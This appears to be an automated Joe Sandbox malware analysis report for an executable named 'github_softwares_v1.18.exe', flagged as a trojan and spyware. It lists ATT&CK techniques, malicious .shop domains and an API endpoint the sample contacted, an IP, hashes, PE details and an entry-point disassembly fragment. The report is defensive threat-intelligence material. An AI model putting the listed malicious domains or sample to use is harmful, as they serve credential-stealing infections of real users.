Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	4 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	12 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
stimultaionsppzv.shop	100%	Avira URL Cloud	malware
http://html4/loose.dtd	0%	Avira URL Cloud	safe
bravedreacisopm.shop	100%	Avira URL Cloud	phishing
https://weaknessmznxo.shop/api	100%	Avira URL Cloud	malware
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://weaknessmznxo.shop/GHd	0%	Avira URL Cloud	safe
horizonvxjis.shop	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
weaknessmznxo.shop	0%	Avira URL Cloud	safe
https://weaknessmznxo.shop/api-L	0%	Avira URL Cloud	safe
https://weaknessmznxo.shop/H	0%	Avira URL Cloud	safe
http://.css	0%	Avira URL Cloud	safe
https://weaknessmznxo.shop:443/api	100%	Avira URL Cloud	malware
https://weaknessmznxo.shop/22	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://weaknessmznxo.shop/api0fB?	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
parntorpkxzlp.shop	0%	Avira URL Cloud	safe
broccoltisop.shop	0%	Avira URL Cloud	safe
grassytaisol.shop	0%	Avira URL Cloud	safe
https://weaknessmznxo.shop/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://gorm.io/docs/hooks.htmlWarning:	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
https://weaknessmznxo.shop/((	0%	Avira URL Cloud	safe
effectivedoxzj.shop	100%	Avira URL Cloud	malware
shellfyyousdjz.shop	0%	Avira URL Cloud	safe
https://support.microsof	0%	Avira URL Cloud	safe
https://weaknessmznxo.shop:443/api6	0%	Avira URL Cloud	safe
https://weaknessmznxo.shop/apiBU	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
weaknessmznxo.shop	172.67.159.243	true	true		unknown
18.31.95.13.in-addr.arpa	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
bravedreacisopm.shop	true	Avira URL Cloud: phishing	unknown
stimultaionsppzv.shop	true	Avira URL Cloud: malware	unknown
https://weaknessmznxo.shop/api	false	Avira URL Cloud: malware	unknown
horizonvxjis.shop	true	Avira URL Cloud: safe	unknown
weaknessmznxo.shop	true	Avira URL Cloud: safe	unknown
broccoltisop.shop	true	Avira URL Cloud: safe	unknown
grassytaisol.shop	true	Avira URL Cloud: safe	unknown
parntorpkxzlp.shop	true	Avira URL Cloud: safe	unknown
effectivedoxzj.shop	true	Avira URL Cloud: malware	unknown
shellfyyousdjz.shop	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	github_softwares_v1.18.exe	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://weaknessmznxo.shop/api-L	BitLockerToGo.exe, 00000001.00000003.1716565174.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://weaknessmznxo.shop/GHd	BitLockerToGo.exe, 00000001.00000003.1754529360.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1754816151.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	BitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1730889198.0000000004FFD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://.css	github_softwares_v1.18.exe	false	Avira URL Cloud: safe	unknown
https://weaknessmznxo.shop/H	BitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1844557480.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://weaknessmznxo.shop:443/api	BitLockerToGo.exe, 00000001.00000003.1830856779.0000000002EF5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://weaknessmznxo.shop/22	BitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1844557480.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	BitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://weaknessmznxo.shop/api0fB?	BitLockerToGo.exe, 00000001.00000003.1743040571.0000000002EF5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://.jpg	github_softwares_v1.18.exe	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://weaknessmznxo.shop/	BitLockerToGo.exe, 00000001.00000003.1743040571.0000000002EF5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gorm.io/docs/hooks.htmlWarning:	github_softwares_v1.18.exe	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	BitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1730889198.0000000004FFD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://weaknessmznxo.shop/((	BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1777480522.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.microsof	BitLockerToGo.exe, 00000001.00000003.1730889198.0000000004FFD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	BitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://weaknessmznxo.shop/h	BitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1844557480.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://weaknessmznxo.shop:443/api6	BitLockerToGo.exe, 00000001.00000003.1730573797.0000000002E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://weaknessmznxo.shop/apiBU	BitLockerToGo.exe, 00000001.00000003.1754529360.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1772726652.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.159.243	weaknessmznxo.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483201
Start date and time:	2024-07-26 20:33:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	github_softwares_v1.18.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 34 Number of non-executed functions: 58
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: github_softwares_v1.18.exe

Simulations

Behavior and APIs

Time	Type	Description
14:34:03	API Interceptor	8x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	https://intralinks.us.com/jallessI1Ae2APharrI1AsassoTxcz01coTxm	Get hash	malicious	HTMLPhisher	Browse	172.67.159.233
	https://mrlocksmithpenticton.com/mlc/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://new-sneww-online-nowz-all.azurewebsites.net/?referrer=appmetrica_tracking_id%3D173005530304969909%26ym_tracking_id%3D10094745761516744100	Get hash	malicious	Unknown	Browse	104.18.36.155
	https://portal.avel-erx.com/esync/app/?token=4276f42c-09fa-4876-aa17-00d2659d77a4	Get hash	malicious	Unknown	Browse	1.1.1.1
	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.213.85
	https://www.canva.com/design/DAGMEHwBhBU/KuqkCNaGGLCBR8SypHXNgw/edit?utm_content=DAGMEHwBhBU&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	Unknown	Browse	188.114.96.3
	Final Shipping Document.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	https://forms.office.com/r/qq9c20HBqa	Get hash	malicious	Tycoon2FA	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.159.243
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	172.67.159.243
	pn24_065.docx.doc	Get hash	malicious	Unknown	Browse	172.67.159.243
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	172.67.159.243
	PRZELEW BANKOWY.xls	Get hash	malicious	Unknown	Browse	172.67.159.243
	DS_Store.exe	Get hash	malicious	CobaltStrike, ReflectiveLoader	Browse	172.67.159.243
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	172.67.159.243
	file.exe	Get hash	malicious	Unknown	Browse	172.67.159.243
	file.exe	Get hash	malicious	Unknown	Browse	172.67.159.243
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	172.67.159.243

Dropped Files

⊘No context

Created / dropped Files

\Device\Mup\user-PC\PIPE\samr

Download File

Process:	C:\Users\user\Desktop\github_softwares_v1.18.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.438743916256937
Encrypted:	false
SSDEEP:	3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
MD5:	E467C82627F5E1524FDB4415AF19FC73
SHA1:	B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
SHA-256:	116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
SHA-512:	2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.34162212584267
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	github_softwares_v1.18.exe
File size:	30'190'080 bytes
MD5:	444cf08b351822e4bec5c4c1b9324942
SHA1:	d5607171f7aa06682efed7ced3ddaff08e2b384b
SHA256:	17aad4db38649728ef0e666755351794d4de41d82a36608226d8656ea54233cb
SHA512:	dbbe22b1c61c62b75d83c747935ed7bf5aad6e6ae55d877e6c249792bce92c0f4341f31f0cc8e30cbe77300f43c8381dbdb1f7fc009631dc19bf5e2692d059cb
SSDEEP:	196608:AHFeZZu9yZJm/e+tNxR8/pwoXebO7RSlhqo+zSaG:AHR9yb2xNxR6xubOtSvqo+2r
TLSH:	DC673A03F89144E4D8EDD574C6668217BB717CA84B3027DB2F60F6256F7ABD1AA7A300
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.........6.............@.............................`......=t....`... ............................

File Icon


Icon Hash:	6179db65163a1919

Static PE Info

General

Entrypoint:	0x1400014c0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x40de3f20, 0x1, 0x40de3ef0, 0x1, 0x40de7990, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	a93101e79783d49279cefd4bc83323ac

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [01C19B75h]
mov dword ptr [eax], 00000001h
call 00007FAEC868FF5Fh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [01C19B55h]
mov dword ptr [eax], 00000000h
call 00007FAEC868FF3Fh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007FAEC947DABCh
dec eax
test eax, eax
sete al
movzx eax, al
neg eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007FAEC8690279h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
jmp dword ptr [eax]
inc edi
outsd
and byte ptr [edx+75h], ah
imul ebp, dword ptr [esp+20h], 203A4449h
and ah, byte ptr [edi+50h]
push ebx
jno 00007FAEC86902CFh
push edi
insd
jns 00007FAEC86902D6h
push ecx
jbe 00007FAEC86902F2h
popad
dec edx
inc ebp
outsb
push ecx
dec edx
jno 00007FAEC869031Ch
das
cmp byte ptr [edi+2Dh], dh
insd
dec edi
dec esp
pop ecx
jp 00007FAEC86902FAh
dec ebx
outsb
xor al, 39h
arpl word ptr [ecx+54h], ax
inc sp
push ebp
dec ecx
das
dec eax
arpl word ptr [esi+70h], si
outsd
xor dword ptr [ebx+42h], eax
push ebx
push eax
pop ecx
jp 00007FAEC86902EAh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1d1d000	0x4e	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d1e000	0x14ec	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d22000	0x11448	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1c1c000	0x5832c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1d34000	0x41d64	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1c1a9a0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1d1e4bc	0x480	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xdee540	0xdee600	ab963a1cd4f2c55fea7f0c2635408277	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xdf0000	0xf77b0	0xf7800	89ce0c29ad0f90a307db0a1f5a266337	False	0.3012645991161616	dBase III DBT, version number 0, next free block index 10, 1st item "kL1lClsw8KM+ESkkq0p98UV7kc203g="	5.182376885907143	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
